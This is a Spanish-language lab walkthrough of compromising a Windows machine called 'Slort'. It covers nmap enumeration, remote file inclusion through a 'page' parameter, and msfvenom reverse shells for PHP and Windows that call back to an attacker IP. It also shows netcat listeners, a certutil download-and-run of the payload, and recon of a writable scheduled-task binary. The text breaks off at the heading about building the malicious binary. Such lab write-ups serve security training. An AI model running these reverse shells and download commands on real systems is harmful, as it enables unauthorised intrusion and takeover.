# Slort

## Resumen

### Información general

|             |                                               |
| ----------- | --------------------------------------------- |
| **Nivel**   | <mark style="color:orange;">Intermedio</mark> |
| **Sistema** | Windows                                       |

### Spoiler! - Roadmap

1. Entre los servicios, se encuentra una aplicación web que cuenta con una ruta `/site` que redirige a `/site/index.php?page=main.php`.
2. En el parámetro `page` se encuentra que es vulnerable a RFI y se incluye por medio del parámetro una URL con nuestra `reverse shell` en `php`.
3. Se enumera el servidor y se encuentra en la carpeta `C:\Backup` la información de una tarea que ejecuta un binario llamado `TFTP.exe` cada 5 minutos y donde vemos que nuestro usuario tiene permisos para modificarlo.
4. Creamos un EXE con el mismo nombre que el fichero que se ejecuta en la tarea y lo sustituimos en el sistema.
5. Esperamos hasta que la tarea se ejecute y PWNED! }:)

## Enumeración

### Escáner con nmap

Enumeración básica de todos los servicios vía TCP, UDP y SCTP:

<pre class="language-bash"><code class="lang-bash"><strong>IP=192.168.198.53
</strong>nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
</code></pre>

Escáner de puertos y servicios con scripts del Top 1000 vía TCP y UDP, y todos los puertos vía TCP:

```bash
nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP
```

#### Resultados de nmap

El segundo escáner (`nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP)` nos da la siguiente información:

```
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| vulners: 
|   cpe:/a:filezilla-project:filezilla_server:0.9.41_beta: 
|       VMSA-2008-0016.3        10.0    https://vulners.com/vmware/VMSA-2008-0016.3
|       VMSA-2008-0014.3        10.0    https://vulners.com/vmware/VMSA-2008-0014.3
|       SSV:3950        10.0    https://vulners.com/seebug/SSV:3950     *EXPLOIT*
|       SSV:11998       10.0    https://vulners.com/seebug/SSV:11998    *EXPLOIT*
|       SAINT:D25EA3A9ECECCE0EAAD76756E80C2619  10.0    https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619        *EXPLOIT*
|       SAINT:98424EE013ADB3A8F0D1BE842CCABF10  10.0    https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10        *EXPLOIT*
|       SAINT:630A6964630CDBFFE209380927EB5D13  10.0    https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13        *EXPLOIT*
|       SAINT:09352C87FBB0235129E935BA72121479  10.0    https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479        *EXPLOIT*
|       D2SEC_JAVAWS2   10.0    https://vulners.com/d2/D2SEC_JAVAWS2    *EXPLOIT*
|       VMSA-2009-0005  9.3     https://vulners.com/vmware/VMSA-2009-0005
|       VMSA-2008-0018  9.3     https://vulners.com/vmware/VMSA-2008-0018
|       SSV:5025        9.3     https://vulners.com/seebug/SSV:5025     *EXPLOIT*
|       SSV:5005        9.3     https://vulners.com/seebug/SSV:5005     *EXPLOIT*
|       SSV:4423        9.3     https://vulners.com/seebug/SSV:4423     *EXPLOIT*
|       VMSA-2009-0007  7.5     https://vulners.com/vmware/VMSA-2009-0007
|       SSV:3423        7.5     https://vulners.com/seebug/SSV:3423     *EXPLOIT*
|       SSV:3166        7.5     https://vulners.com/seebug/SSV:3166     *EXPLOIT*
|       PACKETSTORM:64260       7.5     https://vulners.com/packetstorm/PACKETSTORM:64260       *EXPLOIT*
|       VMSA-2008-0019.1        7.2     https://vulners.com/vmware/VMSA-2008-0019.1
|       SSV:4528        7.2     https://vulners.com/seebug/SSV:4528     *EXPLOIT*
|       SSV:3948        7.2     https://vulners.com/seebug/SSV:3948     *EXPLOIT*
|       VMSA-2009-0015  6.9     https://vulners.com/vmware/VMSA-2009-0015
|       SSV:4422        6.9     https://vulners.com/seebug/SSV:4422     *EXPLOIT*
|       SSV:14961       6.9     https://vulners.com/seebug/SSV:14961    *EXPLOIT*
|       SSV:12550       6.9     https://vulners.com/seebug/SSV:12550    *EXPLOIT*
|       SSV:12541       6.9     https://vulners.com/seebug/SSV:12541    *EXPLOIT*
|       VMSA-2009-0006  6.8     https://vulners.com/vmware/VMSA-2009-0006
|       SSV:12093       6.8     https://vulners.com/seebug/SSV:12093    *EXPLOIT*
|       CLOUDBURST      6.8     https://vulners.com/canvas/CLOUDBURST   *EXPLOIT*
|       SSV:9178        5.0     https://vulners.com/seebug/SSV:9178     *EXPLOIT*
|       SSV:9168        5.0     https://vulners.com/seebug/SSV:9168     *EXPLOIT*
|       SSV:9165        5.0     https://vulners.com/seebug/SSV:9165     *EXPLOIT*
|       SSV:86539       5.0     https://vulners.com/seebug/SSV:86539    *EXPLOIT*
|       SSV:65607       5.0     https://vulners.com/seebug/SSV:65607    *EXPLOIT*
|       SSV:3949        5.0     https://vulners.com/seebug/SSV:3949     *EXPLOIT*
|       SSV:17308       5.0     https://vulners.com/seebug/SSV:17308    *EXPLOIT*
|       PACKETSTORM:68500       5.0     https://vulners.com/packetstorm/PACKETSTORM:68500       *EXPLOIT*
|       PACKETSTORM:68473       5.0     https://vulners.com/packetstorm/PACKETSTORM:68473       *EXPLOIT*
|       PACKETSTORM:68471       5.0     https://vulners.com/packetstorm/PACKETSTORM:68471       *EXPLOIT*
|       EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF    5.0     https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF  *EXPLOIT*
|       EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D  *EXPLOIT*
|       EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095    5.0     https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095  *EXPLOIT*
|       EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D  *EXPLOIT*
|       EDB-ID:6130     5.0     https://vulners.com/exploitdb/EDB-ID:6130       *EXPLOIT*
|       EDB-ID:6123     5.0     https://vulners.com/exploitdb/EDB-ID:6123       *EXPLOIT*
|       EDB-ID:6122     5.0     https://vulners.com/exploitdb/EDB-ID:6122       *EXPLOIT*
|       E-193   5.0     https://vulners.com/dsquare/E-193       *EXPLOIT*
|       D2SEC_VMWARE_DIRTRAV    5.0     https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV     *EXPLOIT*
|       D2SEC_VMWARE    5.0     https://vulners.com/d2/D2SEC_VMWARE     *EXPLOIT*
|       SSV:11498       4.0     https://vulners.com/seebug/SSV:11498    *EXPLOIT*
|_      SSV:3947        2.1     https://vulners.com/seebug/SSV:3947     *EXPLOIT*
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, LDAPBindReq, NULL: 
|_    Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp  open  unknown
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-03-04T17:33:55
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

### Análisis del escáner

#### HTTP - 4443

Entre los servicios detectados, los servicios más comunes, como los servicios web, entre otros (ftp, smb, etc.), suelen ser los de mayor interés y se recomienda analizarlos antes.&#x20;

```
http://192.168.198.53:4443/
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FCEQU1GrvMCkekrHYxpEH%2FPasted%20image%2020230304190711.png?alt=media&#x26;token=5e8041dc-06d1-48f1-8964-db0044897b3e" alt=""><figcaption></figcaption></figure>

### Enumeración de directorios

Se enumeran los directorios y posibles ficheros con las extensiones `html`, `php` y `txt` utilizando el diccionario `directory-list-2.3-medium.txt`:

```
IP=192.168.198.53
feroxbuster -t 200 -L 2 -d 2 -u http:/$IP:4443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --extract-links -o $IP-directory-list-2.3-medium-443.txt -k 
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FVnxNaeaPymzsqbgLGLds%2FPasted%20image%2020230304195331.png?alt=media&#x26;token=90ab4fcb-6823-464c-acbb-894a296d2f75" alt=""><figcaption></figcaption></figure>

Al acceder a la ruta de `/site` se redirige a [`http://192.168.205.53:4443/site/index.php?page=main.php`](http://192.168.205.53:4443/site/index.php?page=main.php).&#x20;

El parámetro `page` hace referencia a un documento que se encuentra almacenado en el servidor web, y podría ser posible que esta entrada no esté securizada, pudiendo ser vulnerable a LFI (Local File Inclusion | Inclusión de ficheros locales) o RFI (Remote File Inclusion | Inclusión de ficheros remotos).

Como nos sería mucho más útil un RFI, puesto que nos facilitaría poder ejecutar una webshell y/o reverse shell. Probamos primero si pudiera ser vulnerable a RFI.

Primero, probamos con una simple comilla, para observar cómo se comporta con esta entrada:

```
http://192.168.205.53:4443/site/index.php?page=%27
```

{% tabs %}
{% tab title="Petición" %}

```
GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


```

{% endtab %}

{% tab title="Respuesta" %}

```
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 21:20:55 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Content-Length: 316
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  include('): failed to open stream: No such file or directory in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />

```

{% endtab %}
{% endtabs %}

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FZiAimxeNJhz3vGcVDpfX%2FPasted%20image%2020230304223503.png?alt=media&#x26;token=173dcb9a-dfaf-477f-885c-90a341d67a00" alt=""><figcaption></figcaption></figure>

Efectivamente, el parámetro no se encuentra adecuadamente securizado y vemos que se utiliza la. función PHP `include`, por lo que vamos a probar a incluir un fichero que se encuentre en nuestro equipo (RFI). En concreto, crearemos una `reverse shell` y pondremos un puerto a la escucha.

## Explotación

### RFI - Inclusión remota de ficheros

Ahora que hemos encontrado un posible punto de entrada, creamos nuestra reverse shell.

{% hint style="warning" %}
**Friendly reminder:** Utilizar siempre que sea posible los puertos 53, 80 o 443. En estos puertos es menos probable que el `firewall` lo bloquee y tener éxito en la ejecución de la  `reverse shell`.
{% endhint %}

```
msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php
```

```
python3 -m http.server 80
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2F1u5pOz2XIGeDnOqZWPdD%2FPasted%20image%2020230304224501.png?alt=media&#x26;token=02784d0f-bedd-4fac-b630-98263ac988f4" alt=""><figcaption></figcaption></figure>

```
sudo rlwrap nc -lnvp 443
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FqnEwsfs4smorRQ5N5fTT%2FPasted%20image%2020230304224514.png?alt=media&#x26;token=0c48d90c-3774-4a77-af82-53773c82282b" alt=""><figcaption></figcaption></figure>

```
http://192.168.205.53:4443/site/index.php?page=http://192.168.45.5/test.php
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FjeLDUHDmwwb3namXmURj%2FPasted%20image%2020230304224203.png?alt=media&#x26;token=9ab3a143-0056-444f-84aa-6caf463f7348" alt=""><figcaption></figcaption></figure>

Y... PWNED! 8)

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2Fh0ax1auB5CDWK6fNgtzP%2FPasted%20image%2020230304224820.png?alt=media&#x26;token=80c7c28a-8aa1-48c3-a93b-ec9cf5ce63b4" alt=""><figcaption></figcaption></figure>

Ahora, para tener una `cmd` mejor, vamos a subir un EXE. Para ello, volvemos a utilizar `msfvenom`:

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=53 -f exe > r.exe
python3 -m http.server 80
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FjCUxNQTmOjiqKOSho3U0%2FPasted%20image%2020230304230924.png?alt=media&#x26;token=125bcd6d-c3cb-4db3-a571-784ec2a4a79c" alt=""><figcaption></figcaption></figure>

Ponemos el puerto `53` a la escucha:

```
sudo rlwrap nc -lnvp 53
```

Ejecutamos en la máquina víctima lo siguiente para descargar el EXE y posteriormente ejecutarlo.

```
certutil.exe -urlcache -split -f "http://192.168.45.5/r.exe"
r.exe
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FlTNxbGi4S2sjm2pAbWq7%2FPasted%20image%2020230304232414.png?alt=media&#x26;token=d85e2338-fd8b-4394-aaa9-6e8a34081252" alt=""><figcaption></figcaption></figure>

Al ejecutarlo, vemos como obtenemos una `cmd` mejor:&#x20;

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FfYSpjsPDpp5562WNLYb0%2FPasted%20image%2020230304232432.png?alt=media&#x26;token=23810abf-cd67-4fb0-a908-ae1bfee03b74" alt=""><figcaption></figcaption></figure>

## Escalada de privilegios

Antes de recurrir e enumeraciones automatizadas, echamos un vistazo rápido por el sistema y realizamos enumeraciones manuales.

### Tarea programada cada 5 minutos

Al acceder a `C:\` vemos una carpeta de `Backup`. Viendo la información de los ficheros, vemos que se ejecuta un EXE cada 5 minutos.

```
cd C:\ && dir
cd Backup && dir
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FfjCKLhAdFn50BtblvNFi%2FPasted%20image%2020230304232725.png?alt=media&#x26;token=1b659609-0dbb-44a7-8d21-22a3b0feb6bf" alt=""><figcaption></figcaption></figure>

### Binario con permisos de escritura

```
type backup.txt
type info.txt
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FfR3gnEn9VjxcYDED1lUR%2FPasted%20image%2020230304233153.png?alt=media&#x26;token=7b5bb222-4786-4cc1-be82-1cd3e0622faa" alt=""><figcaption></figcaption></figure>

Vamos a ver los permisos de ese ejecutable por si pudiéramos tener permisos de escritura para sustituirlo por un ejecutable creado por nosotros.

```
powershell -c "Get-Acl TFTP.exe | fl"
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FDcbPba13ivhNzwwVgn0x%2FPasted%20image%2020230304233838.png?alt=media&#x26;token=1eff578d-29ab-4e57-9df7-24f5f549ae36" alt=""><figcaption></figcaption></figure>

### Creación de binario malicioso

